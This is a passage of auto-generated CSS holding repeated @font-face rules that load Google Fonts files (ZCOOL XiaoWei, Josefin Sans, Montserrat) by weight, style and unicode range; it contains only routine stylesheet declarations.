U+f9-fa, U+fc, U+101, U+103, U+113, U+12b, U+148, U+14d, U+16b, U+1ce, U+1d0, U+300-301, U+1ebf, U+1ec7, U+2013-2014, U+2022, U+2027, U+2039-203a, U+2122, U+3001-3002, U+3042, U+3044, U+3046, U+3048, U+304a-3055, U+3057, U+3059-305b, U+305d, U+305f-3061, U+3063-306b, U+306d-3073, U+3075-3076, U+3078-3079, U+307b, U+307e-307f, U+3081-308d, U+308f, U+3092-3093, U+30a1-30a4, U+30a6-30bb, U+30bd, U+30bf-30c1, U+30c3-30c4, U+30c6-30cb, U+30cd-30d7, U+30d9-30e1, U+30e3-30e7, U+30e9-30ed, U+30ef, U+30f3, U+30fb-30fc, U+3127, U+4e00, U+4e2d, U+65b0, U+65e5, U+6708-6709, U+70b9, U+7684, U+7f51, U+ff0c, U+ff0e, U+ff1a;}/* latin */@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1UFWaHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 *//* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese 